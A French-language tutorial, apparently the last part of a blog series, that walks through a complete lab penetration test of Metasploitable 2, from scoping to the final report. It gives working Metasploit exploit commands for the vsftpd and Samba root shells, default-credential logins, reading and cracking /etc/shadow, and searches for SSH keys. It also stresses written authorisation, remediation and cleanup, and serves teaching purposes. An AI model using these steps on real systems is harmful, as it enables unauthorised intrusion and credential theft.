Le Chemin du Hacker : Série en 5 Parties
Partie 1 : Introduction → Partie 2 : Maîtrise du Flipper → Partie 3 : Fondamentaux de Kali → Partie 4 : Exploitation → Partie 5 : L'Audit Complet
Vous avez commencé cette série en vous demandant ce que font réellement les hackers. Vous avez appris que ce n'est pas une question de capuches et de texte vert. C'est de la résolution méthodique de problèmes. Vous avez cloné des badges, cartographié des réseaux, capturé des handshakes et obtenu des shells sur des machines vulnérables.
Maintenant, nous assemblons le tout. Cet article vous guide à travers un test de pénétration complet contre une cible fictive. Chaque phase, chaque décision, chaque découverte, documentée exactement comme le ferait un professionnel.
Le Scénario
Client : Initech Labs (une petite entreprise tech fictive)
Périmètre : Test de pénétration du réseau interne
Objectif : Identifier les vulnérabilités et démontrer l'impact potentiel sur l'entreprise
Votre cible : Votre propre réseau de laboratoire (Kali + Metasploitable 2 + toute autre VM configurée)
Préparez-vous un café. Ça va être amusant.
Phase 1 : Pré-Engagement
Avant de toucher un clavier, les pentesters professionnels gèrent le côté administratif. Si vous sautez cette étape, vous n'êtes pas un pentester. Vous êtes juste quelqu'un qui commet des délits.
L'Appel de Cadrage
Dans un engagement réel, vous auriez un appel avec le client pour comprendre :
- Qu'est-ce qui est dans le périmètre ? Quels réseaux, plages IP, applications ?
- Qu'est-ce qui est hors périmètre ? Systèmes de production ? Services tiers ?
- Fenêtre de test ? Quand pouvez-vous tester ? Heures ouvrables uniquement ?
- Points de contact ? Qui appelez-vous si quelque chose casse ?
- Objectifs ? Conformité réglementaire ou amélioration réelle de la sécurité ?
Pour Votre Laboratoire
Périmètre : Votre réseau de laboratoire isolé uniquement. Hors périmètre : Tout le reste sur terre. Fenêtre de test : Quand vous voulez. Objectif : Apprendre en pratiquant.
Règles d'Engagement
Les engagements réels ont des règles écrites. Voici ce qu'elles couvrent typiquement :
- Lettre d'autorisation - Document signé prouvant que vous avez la permission
- Procédures d'escalade - Que faire si vous trouvez quelque chose de critique
- Gestion des données - Comment gérer les données sensibles rencontrées
- Exigences de nettoyage - Supprimer tous les outils et portes dérobées à la fin
- Délai du rapport - Quand le rapport final est-il dû ?
Obtenez Toujours une Autorisation Écrite
Même pour des tests "amicaux" sur le réseau d'un ami. Un email signé disant "vous avez la permission de tester mon réseau du DATE au DATE" pourrait faire la différence entre une expérience d'apprentissage et une condamnation pénale. Prenez cela au sérieux.
Phase 2 : Reconnaissance
Il est temps d'apprendre tout sur la cible. Dans un engagement réel, cela inclurait l'OSINT (renseignement en sources ouvertes) : recherches Google, profils LinkedIn, sites web de l'entreprise, enregistrements DNS. Pour notre laboratoire, nous passons directement à la reconnaissance active.
Étape 1 : Découverte du Réseau
Première question : qu'y a-t-il sur ce réseau ?
bash# Trouvez votre plage réseau
ip a | grep inet
# Cherchez quelque chose comme : inet 192.168.56.100/24
# Découvrez tous les hôtes actifs
sudo nmap -sn 192.168.56.0/24 -oA discovery
# Résultats (exemple) :
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).Documentez tout. Créez une note comme celle-ci :
text# Initech Labs - Découverte Réseau
# Date : 2026-03-08
# Testeur : Votre Nom
192.168.56.1 - Passerelle/Routeur
192.168.56.101 - Inconnu (à investiguer)
192.168.56.102 - Inconnu (à investiguer)Étape 2 : Scan de Ports
Maintenant nous creusons plus profond. Quels services tournent ?
bash# Scan complet de ports avec détection de services
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
# Cela prend du temps. Pour des résultats plus rapides pendant l'apprentissage :
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101Sur Metasploitable 2, vous verrez un trésor :
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...Quelle exposition. Mettons à jour nos notes :
text192.168.56.101 - Serveur Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # Porte dérobée connue !
- SSH (22): OpenSSH 4.7p1 # Ancien
- Telnet (23): Actif # Pourquoi ça existe encore en 2026 ?
- HTTP (80): Apache 2.2.8 # Apps web à tester
- SMB (139/445): Samba 3.X # Mine d'or potentielle
- MySQL (3306): 5.0.51a # Accès base de données ?
- PostgreSQL (5432): Actif # Autre BDDÉtape 3 : Identification des Vulnérabilités
Voyons ce qui est réellement exploitable.
bash# Exécuter les scripts de vulnérabilités
sudo nmap --script vuln -oA vuln_scan 192.168.56.101
# Vérifier des services spécifiques dans Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2La porte dérobée vsftpd 2.3.4 saute immédiatement aux yeux. C'est un shell garanti. Mais un bon pentester ne s'arrête pas à la première découverte. Vous documentez tout.
Phase 3 : Exploitation
C'est là que ça devient passionnant. Nous avons plusieurs points d'entrée potentiels. Travaillons-les systématiquement.
Vecteur d'Attaque 1 : Porte Dérobée FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
root
id
uid=0(root) gid=0(root)Découverte documentée : Shell root obtenu via la porte dérobée FTP. Temps entre le premier scan et la compromission totale : environ 10 minutes.
Mais nous ne nous arrêtons pas là. Quoi d'autre est accessible ?
Vecteur d'Attaque 2 : Samba
bash# Mettre la session en arrière-plan
background
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[*] Command shell session 2 opened
whoami
rootUn autre shell root via un vecteur différent. Deux chemins indépendants vers la compromission totale.
Vecteur d'Attaque 3 : Applications Web
Voyons ce qui tourne sur le port 80.
bash# Énumérer les répertoires web
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
# Résultats :
/cgi-bin/ (Status: 403)
/dav/ (Status: 301)
/icons/ (Status: 301)
/index (Status: 200)
/phpMyAdmin/ (Status: 301)
/phpinfo (Status: 200)
/test/ (Status: 301)
/twiki/ (Status: 301)
# Exécuter nikto pour plus de découvertes
nikto -h http://192.168.56.101phpMyAdmin avec des identifiants par défaut ? Vérifions :
text# Essayer les identifiants courants
Username: root
Password: (vide)
# Accès accordé !Accès administrateur à la base de données sans mot de passe. De là, nous pourrions extraire toutes les données, modifier les enregistrements ou utiliser les opérations fichiers de MySQL pour écrire un web shell.
Vecteur d'Attaque 4 : Identifiants SSH Faibles
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'Des identifiants faibles donnent un accès SSH. Pas root, mais nous gérerons cela en post-exploitation.
Phase 4 : Post-Exploitation
Nous avons l'accès. Et maintenant ? Un vrai test de pénétration démontre l'impact business. Que peut réellement faire un attaquant avec cet accès ?
Récolte d'Identifiants
bash# Depuis notre shell root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::
# Sauvegarder pour le cracking hors ligne
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
# Sur Kali, les craquer
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtReconnaissance Réseau (Depuis l'Intérieur)
bash# Quels autres réseaux cette machine peut-elle atteindre ?
ifconfig
route -n
cat /etc/hosts
arp -a
# Qu'est-ce qui se connecte à cette machine ?
netstat -tulpn
ss -tulpn
# Chercher des clés SSH (pour le mouvement latéral)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullDécouverte de Données Sensibles
bash# Chercher des fichiers intéressants
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
# Vérifier les emplacements de configuration courants
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf
# Énumération de la base de données
mysql -u root -p # Essayer mot de passe vide
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;Élévation de Privilèges (depuis msfadmin)
Rappelez-vous cette connexion SSH en tant que msfadmin ? Passons root en utilisant ce que nous avons appris dans la Partie 4.
bash# SSH en tant que msfadmin
ssh [email protected]
# Vérifier les permissions sudo
sudo -l
# (La sortie varie, vérifions d'autres vecteurs)
# Trouver les binaires SUID
find / -perm -4000 2>/dev/null
# Chercher des scripts modifiables exécutés par root
cat /etc/crontab
# Télécharger et exécuter LinPEAS pour une vérification complète
# (Dans un scénario réel, déjà couvert dans la Partie 4)Phase 5 : Documentation et Découvertes
Le test est inutile sans rapport. C'est ce qui sépare les professionnels des script kiddies. Vous devez expliquer ce que vous avez trouvé, pourquoi c'est important et comment le corriger.
Résumé des Découvertes
Voici ce que nous avons trouvé sur le réseau d'"Initech Labs", formaté comme dans un vrai rapport :
CRITIQUE : Porte Dérobée du Service FTP (CVE-2011-2523)
Système Affecté : 192.168.56.101
Risque : Exécution de code à distance non authentifiée en tant que root
Preuve : Shell root complet obtenu en moins de 60 secondes
Recommandation : Mettre à jour immédiatement vsftpd vers la version actuelle ou désactiver entièrement le service FTP.
CRITIQUE : Exécution de Code à Distance via Samba
Système Affecté : 192.168.56.101
Risque : Exécution de code à distance non authentifiée en tant que root
Preuve : Shell root complet obtenu via l'exploit usermap_script
Recommandation : Mettre à jour Samba vers la version actuelle. Restreindre l'accès SMB aux systèmes nécessaires uniquement.
ÉLEVÉ : Accès Root MySQL Sans Mot de Passe
Système Affecté : 192.168.56.101
Risque : Compromission complète de la base de données, vol de données, déploiement de web shell
Preuve : Connexion en tant que root avec mot de passe vide via phpMyAdmin
Recommandation : Définir un mot de passe root fort. Restreindre l'accès à phpMyAdmin. Envisager de supprimer phpMyAdmin complètement.
ÉLEVÉ : Identifiants SSH Faibles
Système Affecté : 192.168.56.101
Risque : Accès authentifié menant à une élévation de privilèges
Preuve : msfadmin:msfadmin authentifié avec succès
Recommandation : Imposer une politique de mots de passe forts. Implémenter l'authentification SSH par clé. Considérer fail2ban.
MOYEN : Service Telnet Activé
Système Affecté : 192.168.56.101
Risque : Identifiants transmis en clair
Preuve : Port 23 ouvert et acceptant les connexions
Recommandation : Désactiver Telnet. Utiliser SSH pour toute administration à distance.
BAS : Page phpinfo() Exposée
Système Affecté : 192.168.56.101
Risque : La divulgation d'information facilite les attaques ultérieures
Preuve : http://192.168.56.101/phpinfo accessible sans authentification
Recommandation : Supprimer ou restreindre l'accès aux pages phpinfo.
Résumé Exécutif
C'est ce que les dirigeants lisent réellement. Gardez-le court, percutant et sans jargon :
Résumé Exécutif
Pendant le test de pénétration du réseau interne d'Initech Labs, l'équipe de sécurité a obtenu le contrôle administratif complet du serveur principal en 10 minutes après le début de l'évaluation.
Découvertes Clés :
- 2 vulnérabilités critiques permettant une prise de contrôle à distance immédiate
- 2 problèmes de haute sévérité exposant bases de données et identifiants utilisateur
- Plusieurs découvertes moyennes et basses indiquant des lacunes de sécurité systémiques
Conclusion : Un attaquant avec des compétences basiques pourrait compromettre entièrement ce système en minutes. Une remédiation immédiate est requise pour toutes les découvertes critiques et élevées. Une évaluation de suivi est recommandée après application des correctifs.
Phase 6 : Nettoyage et Clôture
Un pentester professionnel laisse l'environnement exactement comme il l'a trouvé.
bash# Documenter toutes les sessions
msf6 > sessions -l
# Fermer toutes les sessions
msf6 > sessions -K
# Sur la cible (si vous avez créé des fichiers) :
rm /tmp/linpeas.sh
rm /tmp/*.txt
# Supprimer les utilisateurs créés
userdel testuser
# Supprimer les clés SSH ajoutées
rm /home/*/.ssh/authorized_keys
# Documenter tout ce que vous avez suppriméDans un engagement réel, vous devriez aussi :
- Supprimer tous les outils téléchargés pendant les tests
- Documenter tout changement apporté à l'environnement
- Fournir les hashes/checksums des données extraites
- Supprimer de manière sécurisée toutes les données client après livraison du rapport
La Liste de Vérification Méthodologique Complète
Voici votre workflow réutilisable pour tout test de pénétration :
Méthodologie de Test de Pénétration
- Pré-Engagement
- Définir le périmètre et les règles d'engagement
- Obtenir l'autorisation écrite
- Établir les canaux de communication
- Configurer votre environnement de test
- Reconnaissance
- Découverte réseau (énumération des hôtes)
- Scan de ports et identification des services
- Scan de vulnérabilités
- Énumération des applications web
- Tout documenter
- Exploitation
- Valider les vulnérabilités (ne faites pas aveuglément confiance aux scanners)
- Exploiter les vulnérabilités confirmées
- Documenter chaque compromission réussie
- Capturer les preuves (captures d'écran, logs)
- Post-Exploitation
- Énumérer le système compromis
- Récolter les identifiants
- Identifier les données sensibles
- Tenter l'élévation de privilèges
- Chercher des opportunités de mouvement latéral
- Rapport
- Rédiger le résumé exécutif (impact business)
- Documenter toutes les découvertes avec preuves
- Fournir des recommandations de remédiation
- Inclure les détails techniques pour les équipes IT
- Nettoyage
- Supprimer tous les outils et artefacts
- Fermer toutes les sessions et portes dérobées
- Documenter tout changement d'environnement
- Gérer de manière sécurisée les données client
La Suite : Votre Chemin
Vous avez terminé Le Chemin du Hacker. Vous êtes passé de "qu'est-ce que le hacking ?" à la réalisation d'un test de pénétration complet. C'est réellement impressionnant.
Mais ce n'est que le début. Voici où aller ensuite :
Plateformes de Pratique
- Hack The Box - Machines réalistes pour s'entraîner. Commencez par les boxes retirées "Faciles".
- TryHackMe - Parcours d'apprentissage guidés. Excellent pour une progression structurée.
- VulnHub - VMs vulnérables gratuites à télécharger et pratiquer localement.
- PentesterLab - Axé sur la sécurité des applications web.
Certifications (Si Vous le Souhaitez)
- eJPT (eLearnSecurity Junior Penetration Tester) - Excellent point de départ, examen pratique
- OSCP (Offensive Security Certified Professional) - Le standard de l'industrie, brutal mais respecté
- PNPT (Practical Network Penetration Tester) - Moderne, pratique, inclut la rédaction de rapport
- CEH (Certified Ethical Hacker) - Pour les exigences corporate, moins pratique
Spécialisations
- Sécurité des Applications Web - OWASP, Burp Suite, injection SQL, XSS
- Active Directory - La plupart des environnements d'entreprise l'utilisent
- Sécurité Cloud - Pentest AWS, Azure, GCP
- Sécurité Mobile - Tests d'applications Android/iOS
- Red Teaming - Simulation complète d'adversaire, physique + numérique
- Rétro-Ingénierie - Analyse de malware, développement d'exploits
Construisez Votre Laboratoire Maison
Les meilleurs pentesters ont des laboratoires élaborés. Commencez simple et développez :
- Ajoutez Windows Server avec Active Directory
- Configurez un contrôleur de domaine
- Déployez des applications web vulnérables (DVWA, bWAPP, WebGoat)
- Construisez un réseau avec plusieurs segments
- Ajoutez HoneyAegis pour voir les attaques du point de vue du défenseur
Le Chemin du Hacker : Terminé
Vous y êtes arrivé. Les cinq parties, de curieux à compétent.
Partie 1 : Introduction Partie 2 : Maîtrise du Flipper Partie 3 : Fondamentaux de Kali Partie 4 : Exploitation Partie 5 : L'Audit Complet
Série Terminée - Votre Parcours
Partie 1 : Vous avez appris ce qu'est réellement le hacking et obtenu vos premières victoires avec le Flipper Zero
Partie 2 : Vous avez maîtrisé chaque protocole du Flipper : Sub-GHz, RFID, NFC, BadUSB, GPIO
Partie 3 : Vous avez construit votre laboratoire Kali, appris nmap et capturé des handshakes WiFi
Partie 4 : Vous avez maîtrisé Metasploit, l'exploitation, l'élévation de privilèges et le pivoting
Partie 5 : Vous avez tout assemblé en une méthodologie complète de test de pénétration
La sécurité n'est pas une destination. C'est une pratique. Les outils changeront, les vulnérabilités évolueront, mais la méthodologie reste la même. Questionnez tout. Documentez tout. N'arrêtez jamais d'apprendre.
Bienvenue de l'autre côté.
- Lee